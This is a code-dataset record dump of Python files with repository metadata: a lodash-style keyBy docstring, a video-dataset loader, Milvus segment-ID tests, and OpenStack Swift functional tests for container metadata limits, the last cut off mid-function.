861d752047ab52898bef08692dfab9cff74785f4
| 689
|
py
|
Python
|
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | 2
|
2019-11-04T08:40:41.000Z
|
2020-03-19T19:37:05.000Z
|
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | null | null | null |
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | null | null | null |
"""
In lodash,
#. List of json => json of json
#. _.keyBy("(Key-String)")([
{"(Key-String)": <key-value>, "(String)": <value>, "(String)": <value>, ...},
{"(Key-String)": <key-value>, "(String)": <value>, "(String)": <value>, ...},
...
]) => {
<key-value>: {"(String)": <value>, "(String)": <value>, ...},
<key-value>: {"(String)": <value>, "(String)": <value>, ...},
...
}
#. _.keyBy("(Key-String)").mapValue("(Map-String)")([
{"(Key-String)": <key-value>, "(Map-String)": <map-value>, ...},
{"(Key-String)": <key-value>, "(Map-String)": <map-value>, ...},
...
]) => {
<key-value>: <map-value>,
<key-value>: <map-value>,
...
}
"""
| 24.607143
| 81
| 0.454282
| 69
| 689
| 4.507246
| 0.15942
| 0.205788
| 0.411576
| 0.21865
| 0.803859
| 0.765273
| 0.672026
| 0.672026
| 0.672026
| 0.289389
| 0
| 0
| 0.181422
| 689
| 27
| 82
| 25.518519
| 0.551418
| 0.984035
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8686f6e62b21500c986bd6f828adff7bd6a73952
| 5,563
|
py
|
Python
|
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | 2
|
2018-07-09T01:58:56.000Z
|
2018-07-09T01:59:03.000Z
|
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | null | null | null |
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | 1
|
2020-02-21T12:53:59.000Z
|
2020-02-21T12:53:59.000Z
|
from datasets.kinetics import Kinetics
from datasets.activitynet import ActivityNet
from datasets.ucf101 import UCF101
from datasets.hmdb51 import HMDB51
from datasets.moments import Moments
def get_training_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51', 'moments']
if opt.dataset == 'kinetics':
training_data = Kinetics(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'activitynet':
training_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'training',
False,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'ucf101':
training_data = UCF101(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'hmdb51':
training_data = HMDB51(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == "moments":
training_data = Moments(
"/media/lili/fce9875a-a5c8-4c35-8f60-db60be29ea5d/Moments_in_Time_Raw/training/",
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
return training_data
def get_validation_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51', 'moments']
if opt.dataset == 'kinetics':
validation_data = Kinetics(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'activitynet':
validation_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'validation',
False,
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
validation_data = UCF101(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'hmdb51':
validation_data = HMDB51(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == "moments":
validation_data = Moments(
"/media/lili/fce9875a-a5c8-4c35-8f60-db60be29ea5d/Moments_in_Time_Raw/validation/",
opt.annotation_path,
'validation',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
return validation_data
def get_test_set(opt, spatial_transform, temporal_transform, target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51']
assert opt.test_subset in ['val', 'test']
if opt.test_subset == 'val':
subset = 'validation'
elif opt.test_subset == 'test':
subset = 'testing'
if opt.dataset == 'kinetics':
test_data = Kinetics(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration,
sample_stride=opt.sample_stride)
elif opt.dataset == 'activitynet':
test_data = ActivityNet(
opt.video_path,
opt.annotation_path,
subset,
True,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
test_data = UCF101(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'hmdb51':
test_data = HMDB51(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
return test_data
| 33.920732
| 95
| 0.599137
| 516
| 5,563
| 6.162791
| 0.094961
| 0.115723
| 0.18805
| 0.176415
| 0.80283
| 0.80283
| 0.80283
| 0.795283
| 0.723585
| 0.723585
| 0
| 0.02476
| 0.324825
| 5,563
| 163
| 96
| 34.128834
| 0.821885
| 0
| 0
| 0.764706
| 0
| 0
| 0.088621
| 0.028402
| 0
| 0
| 0
| 0
| 0.026144
| 1
| 0.019608
| false
| 0
| 0.03268
| 0
| 0.071895
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
86902a72556d22ef7d2160dc5f2cc1efe6a54ce4
| 13,208
|
py
|
Python
|
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
dddddai/milvus
|
c6887460451787475f7116f92cfeba4e9239dc44
|
[
"Apache-2.0"
] | 1
|
2021-12-18T16:11:20.000Z
|
2021-12-18T16:11:20.000Z
|
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
ucasfl/milvus
|
7a37de43d8dc0f3c003fe789d5d4d6d95043e40f
|
[
"Apache-2.0"
] | null | null | null |
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
ucasfl/milvus
|
7a37de43d8dc0f3c003fe789d5d4d6d95043e40f
|
[
"Apache-2.0"
] | null | null | null |
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils import *
dim = 128
segment_row_count = 100000
nb = 6000
tag = "1970_01_01"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
collection_id = "list_id_in_segment"
entity = gen_entities(1)
raw_vector, binary_entity = gen_binary_entities(1)
entities = gen_entities(nb)
raw_vectors, binary_entities = gen_binary_entities(nb)
default_fields = gen_default_fields()
def get_segment_id(connect, collection, nb=1, vec_type='float', index_params=None):
if vec_type != "float":
vectors, entities = gen_binary_entities(nb)
else:
entities = gen_entities(nb)
ids = connect.insert(collection, entities)
connect.flush([collection])
if index_params:
if vec_type == 'float':
connect.create_index(collection, field_name, index_params)
else:
connect.create_index(collection, binary_field_name, index_params)
stats = connect.get_collection_stats(collection)
return ids, stats["partitions"][0]["segments"][0]["id"]
class TestListIdInSegmentBase:
"""
******************************************************************
The following cases are used to test `list_id_in_segment` function
******************************************************************
"""
def test_list_id_in_segment_collection_name_None(self, connect, collection):
'''
target: get vector ids where collection name is None
method: call list_id_in_segment with the collection_name: None
expected: exception raised
'''
collection_name = None
ids, segment_id = get_segment_id(connect, collection)
with pytest.raises(Exception) as e:
connect.list_id_in_segment(collection_name, segment_id)
def test_list_id_in_segment_collection_name_not_existed(self, connect, collection):
'''
target: get vector ids where collection name does not exist
method: call list_id_in_segment with a random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(collection_id)
ids, segment_id = get_segment_id(connect, collection)
with pytest.raises(Exception) as e:
vector_ids = connect.list_id_in_segment(collection_name, segment_id)
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
def test_list_id_in_segment_collection_name_invalid(self, connect, collection, get_collection_name):
'''
target: get vector ids where collection name is invalid
method: call list_id_in_segment with invalid collection_name
expected: status not ok
'''
collection_name = get_collection_name
ids, segment_id = get_segment_id(connect, collection)
with pytest.raises(Exception) as e:
connect.list_id_in_segment(collection_name, segment_id)
def test_list_id_in_segment_name_None(self, connect, collection):
'''
target: get vector ids where segment name is None
method: call list_id_in_segment with the name: None
expected: exception raised
'''
ids, segment_id = get_segment_id(connect, collection)
segment = None
with pytest.raises(Exception) as e:
vector_ids = connect.list_id_in_segment(collection, segment)
def test_list_id_in_segment_name_not_existed(self, connect, collection):
'''
target: get vector ids where segment name does not exist
method: call list_id_in_segment with a random segment name
expected: status not ok
'''
ids, seg_id = get_segment_id(connect, collection)
# segment = gen_unique_str(collection_id)
with pytest.raises(Exception) as e:
vector_ids = connect.list_id_in_segment(collection, seg_id + 10000)
@pytest.mark.level(2)
def test_list_id_in_segment_without_index_A(self, connect, collection):
'''
target: get vector ids when there is no index
method: call list_id_in_segment and check if the segment contains vectors
expected: status ok
'''
nb = 1
ids, seg_id = get_segment_id(connect, collection, nb=nb)
vector_ids = connect.list_id_in_segment(collection, seg_id)
# vector_ids should match ids
assert len(vector_ids) == nb
assert vector_ids[0] == ids[0]
@pytest.mark.level(2)
def test_list_id_in_segment_without_index_B(self, connect, collection):
'''
target: get vector ids when there is no index but with partition
method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
expected: status ok
'''
nb = 10
entities = gen_entities(nb)
connect.create_partition(collection, tag)
ids = connect.insert(collection, entities, partition_tag=tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["partitions"][1]["tag"] == tag
vector_ids = connect.list_id_in_segment(collection, stats["partitions"][1]["segments"][0]["id"])
# vector_ids should match ids
assert len(vector_ids) == nb
for i in range(nb):
assert vector_ids[i] == ids[i]
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.mark.level(2)
def test_list_id_in_segment_with_index_A(self, connect, collection, get_simple_index):
'''
target: get vector ids when there is index
method: call list_id_in_segment and check if the segment contains vectors
expected: status ok
'''
ids, seg_id = get_segment_id(connect, collection, nb=nb, index_params=get_simple_index)
try:
connect.list_id_in_segment(collection, seg_id)
except Exception as e:
assert False, str(e)
# TODO:
@pytest.mark.level(2)
def test_list_id_in_segment_with_index_B(self, connect, collection, get_simple_index):
'''
target: get vector ids when there is index and with partition
method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
expected: status ok
'''
connect.create_partition(collection, tag)
ids = connect.insert(collection, entities, partition_tag=tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["partitions"][1]["tag"] == tag
try:
connect.list_id_in_segment(collection, stats["partitions"][1]["segments"][0]["id"])
except Exception as e:
assert False, str(e)
# vector_ids should match ids
# TODO
@pytest.mark.level(2)
def test_list_id_in_segment_after_delete_vectors(self, connect, collection):
'''
target: get vector ids after vectors are deleted
method: add vectors and delete a few, call list_id_in_segment
expected: status ok, vector_ids decreased after vectors deleted
'''
nb = 2
ids, seg_id = get_segment_id(connect, collection, nb=nb)
delete_ids = [ids[0]]
status = connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
vector_ids = connect.list_id_in_segment(collection, stats["partitions"][0]["segments"][0]["id"])
assert len(vector_ids) == 1
assert vector_ids[0] == ids[1]
@pytest.mark.level(2)
def test_list_id_in_segment_with_index_ip(self, connect, collection, get_simple_index):
'''
target: get vector ids when there is index
method: call list_id_in_segment and check if the segment contains vectors
expected: ids returned in ids inserted
'''
get_simple_index["metric_type"] = "IP"
ids, seg_id = get_segment_id(connect, collection, nb=nb, index_params=get_simple_index)
vector_ids = connect.list_id_in_segment(collection, seg_id)
# TODO:
assert vector_ids == ids
class TestListIdInSegmentBinary:
"""
******************************************************************
The following cases are used to test `list_id_in_segment` function
******************************************************************
"""
@pytest.mark.level(2)
def test_list_id_in_segment_without_index_A(self, connect, binary_collection):
'''
target: get vector ids when there is no index
method: call list_id_in_segment and check if the segment contains vectors
expected: status ok
'''
nb = 10
vectors, entities = gen_binary_entities(nb)
ids = connect.insert(binary_collection, entities)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][0]["segments"][0]["id"])
# vector_ids should match ids
assert len(vector_ids) == nb
for i in range(nb):
assert vector_ids[i] == ids[i]
@pytest.mark.level(2)
def test_list_id_in_segment_without_index_B(self, connect, binary_collection):
'''
target: get vector ids when there is no index but with partition
method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
expected: status ok
'''
connect.create_partition(binary_collection, tag)
nb = 10
vectors, entities = gen_binary_entities(nb)
ids = connect.insert(binary_collection, entities, partition_tag=tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][1]["segments"][0]["id"])
# vector_ids should match ids
assert len(vector_ids) == nb
for i in range(nb):
assert vector_ids[i] == ids[i]
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("not support")
def test_list_id_in_segment_with_index_A(self, connect, binary_collection, get_jaccard_index):
'''
target: get vector ids when there is index
method: call list_id_in_segment and check if the segment contains vectors
expected: status ok
'''
ids, seg_id = get_segment_id(connect, binary_collection, nb=nb, index_params=get_jaccard_index, vec_type='binary')
vector_ids = connect.list_id_in_segment(binary_collection, seg_id)
# TODO:
def test_list_id_in_segment_with_index_B(self, connect, binary_collection, get_jaccard_index):
'''
target: get vector ids when there is index and with partition
method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
expected: status ok
'''
connect.create_partition(binary_collection, tag)
ids = connect.insert(binary_collection, binary_entities, partition_tag=tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats["partitions"][1]["tag"] == tag
vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][1]["segments"][0]["id"])
# vector_ids should match ids
# TODO
def test_list_id_in_segment_after_delete_vectors(self, connect, binary_collection, get_jaccard_index):
'''
target: get vector ids after vectors are deleted
method: add vectors and delete a few, call list_id_in_segment
expected: status ok, vector_ids decreased after vectors deleted
'''
nb = 2
ids, seg_id = get_segment_id(connect, binary_collection, nb=nb, vec_type='binary', index_params=get_jaccard_index)
delete_ids = [ids[0]]
status = connect.delete_entity_by_id(binary_collection, delete_ids)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][0]["segments"][0]["id"])
assert len(vector_ids) == 1
assert vector_ids[0] == ids[1]
| 42.333333
| 122
| 0.66119
| 1,697
| 13,208
| 4.867413
| 0.088981
| 0.037046
| 0.049395
| 0.092615
| 0.837651
| 0.797337
| 0.758596
| 0.747821
| 0.724455
| 0.696731
| 0
| 0.007526
| 0.235463
| 13,208
| 311
| 123
| 42.469453
| 0.810458
| 0.242429
| 0
| 0.532609
| 0
| 0
| 0.041077
| 0
| 0
| 0
| 0
| 0.016077
| 0.097826
| 1
| 0.108696
| false
| 0
| 0.043478
| 0
| 0.179348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86cf34d8d1a6f5beb1470d0cf9e618230e9e71ea
| 68,271
|
py
|
Python
|
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
#!/usr/bin/python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest2
from uuid import uuid4
from test.functional import check_response, cluster_info, retry, \
requires_acls, load_constraint, requires_policies, SkipTest
import test.functional as tf
from six.moves import range
def setUpModule():
tf.setup_package()
def tearDownModule():
tf.teardown_package()
class TestContainer(unittest2.TestCase):
def setUp(self):
if tf.skip:
raise SkipTest
self.name = uuid4().hex
# this container isn't created by default, but will be cleaned up
self.container = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
# If the request was received and processed but the container-server
# timed out getting the response back to the proxy, or the proxy timed
# out getting the response back to the client, the next retry will 202
self.assertIn(resp.status, (201, 202))
self.max_meta_count = load_constraint('max_meta_count')
self.max_meta_name_length = load_constraint('max_meta_name_length')
self.max_meta_overall_size = load_constraint('max_meta_overall_size')
self.max_meta_value_length = load_constraint('max_meta_value_length')
def tearDown(self):
if tf.skip:
raise SkipTest
def get(url, token, parsed, conn, container):
conn.request(
'GET', parsed.path + '/' + container + '?format=json', '',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, container, obj):
path = '/'.join([parsed.path, container,
obj['name'].encode('utf8')])
conn.request('DELETE', path, '', {'X-Auth-Token': token})
return check_response(conn)
for container in (self.name, self.container):
while True:
resp = retry(get, container)
body = resp.read()
if resp.status == 404:
break
self.assertEqual(resp.status // 100, 2, resp.status)
objs = json.loads(body)
if not objs:
break
for obj in objs:
resp = retry(delete, container, obj)
resp.read()
# Under load, container listing may not upate immediately,
# so we may attempt to delete the same object multiple
# times. Tolerate the object having already been deleted.
self.assertIn(resp.status, (204, 404))
def delete(url, token, parsed, conn, container):
conn.request('DELETE', parsed.path + '/' + container, '',
{'X-Auth-Token': token})
return check_response(conn)
for container in (self.name, self.container):
resp = retry(delete, container)
resp.read()
# self.container may not have been created at all, but even if it
# has, for either container there may be a failure that trips the
# retry despite the request having been successfully processed.
self.assertIn(resp.status, (204, 404))
def test_multi_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, name, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, name: value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(post, 'X-Container-Meta-One', '1')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-one'), '1')
resp = retry(post, 'X-Container-Meta-Two', '2')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-one'), '1')
self.assertEqual(resp.getheader('x-container-meta-two'), '2')
def test_unicode_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, name, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, name: value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
uni_key = u'X-Container-Meta-uni\u0E12'
uni_value = u'uni\u0E12'
if (tf.web_front_end == 'integral'):
resp = retry(post, uni_key, '1')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader(uni_key.encode('utf-8')), '1')
resp = retry(post, 'X-Container-Meta-uni', uni_value)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('X-Container-Meta-uni'),
uni_value.encode('utf-8'))
if (tf.web_front_end == 'integral'):
resp = retry(post, uni_key, uni_value)
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader(uni_key.encode('utf-8')),
uni_value.encode('utf-8'))
def test_PUT_metadata(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn, name, value):
conn.request('PUT', parsed.path + '/' + name, '',
{'X-Auth-Token': token,
'X-Container-Meta-Test': value})
return check_response(conn)
def head(url, token, parsed, conn, name):
conn.request('HEAD', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
name = uuid4().hex
resp = retry(put, name, 'Value')
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(head, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(get, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 204)
name = uuid4().hex
resp = retry(put, name, '')
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(head, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(get, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 204)
def test_POST_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Meta-Test': value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(get)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(post, 'Value')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(get)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
def test_PUT_bad_metadata(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn, name, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('PUT', parsed.path + '/' + name, '', headers)
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
name = uuid4().hex
resp = retry(
put, name,
{'X-Container-Meta-' + ('k' * self.max_meta_name_length): 'v'})
resp.read()
self.assertIn(resp.status, (201, 202))
resp = retry(delete, name)
resp.read()
self.assertIn(resp.status, (204, 404))
name = uuid4().hex
resp = retry(
put, name,
{'X-Container-Meta-' + (
'k' * (self.max_meta_name_length + 1)): 'v'})
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 404)
name = uuid4().hex
resp = retry(
put, name,
{'X-Container-Meta-Too-Long': 'k' * self.max_meta_value_length})
resp.read()
self.assertIn(resp.status, (201, 202))
resp = retry(delete, name)
resp.read()
self.assertIn(resp.status, (204, 404))
name = uuid4().hex
resp = retry(
put, name,
{'X-Container-Meta-Too-Long': 'k' * (
self.max_meta_value_length + 1)})
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 404)
name = uuid4().hex
headers = {}
for x in range(self.max_meta_count):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(put, name, headers)
resp.read()
self.assertIn(resp.status, (201, 202))
resp = retry(delete, name)
resp.read()
self.assertIn(resp.status, (204, 404))
name = uuid4().hex
headers = {}
for x in range(self.max_meta_count + 1):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(put, name, headers)
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 404)
name = uuid4().hex
headers = {}
header_value = 'k' * self.max_meta_value_length
size = 0
x = 0
while size < (self.max_meta_overall_size - 4
- self.max_meta_value_length):
size += 4 + self.max_meta_value_length
headers['X-Container-Meta-%04d' % x] = header_value
x += 1
if self.max_meta_overall_size - size > 1:
headers['X-Container-Meta-k'] = \
'v' * (self.max_meta_overall_size - size - 1)
resp = retry(put, name, headers)
resp.read()
self.assertIn(resp.status, (201, 202))
resp = retry(delete, name)
resp.read()
self.assertIn(resp.status, (204, 404))
name = uuid4().hex
headers['X-Container-Meta-k'] = \
'v' * (self.max_meta_overall_size - size)
resp = retry(put, name, headers)
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 404)
def test_POST_bad_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('POST', parsed.path + '/' + self.name, '', headers)
return check_response(conn)
resp = retry(
post,
{'X-Container-Meta-' + ('k' * self.max_meta_name_length): 'v'})
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(
post,
{'X-Container-Meta-' + (
'k' * (self.max_meta_name_length + 1)): 'v'})
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(
post,
{'X-Container-Meta-Too-Long': 'k' * self.max_meta_value_length})
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(
post,
{'X-Container-Meta-Too-Long': 'k' * (
self.max_meta_value_length + 1)})
resp.read()
self.assertEqual(resp.status, 400)
def test_POST_bad_metadata2(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('POST', parsed.path + '/' + self.name, '', headers)
return check_response(conn)
headers = {}
for x in range(self.max_meta_count):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 204)
headers = {}
for x in range(self.max_meta_count + 1):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 400)
def test_POST_bad_metadata3(self):
if tf.skip:
raise SkipTest
if tf.in_process:
tf.skip_if_no_xattrs()
def post(url, token, parsed, conn, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('POST', parsed.path + '/' + self.name, '', headers)
return check_response(conn)
headers = {}
header_value = 'k' * self.max_meta_value_length
size = 0
x = 0
while size < (self.max_meta_overall_size - 4
- self.max_meta_value_length):
size += 4 + self.max_meta_value_length
headers['X-Container-Meta-%04d' % x] = header_value
x += 1
if self.max_meta_overall_size - size > 1:
headers['X-Container-Meta-k'] = \
'v' * (self.max_meta_overall_size - size - 1)
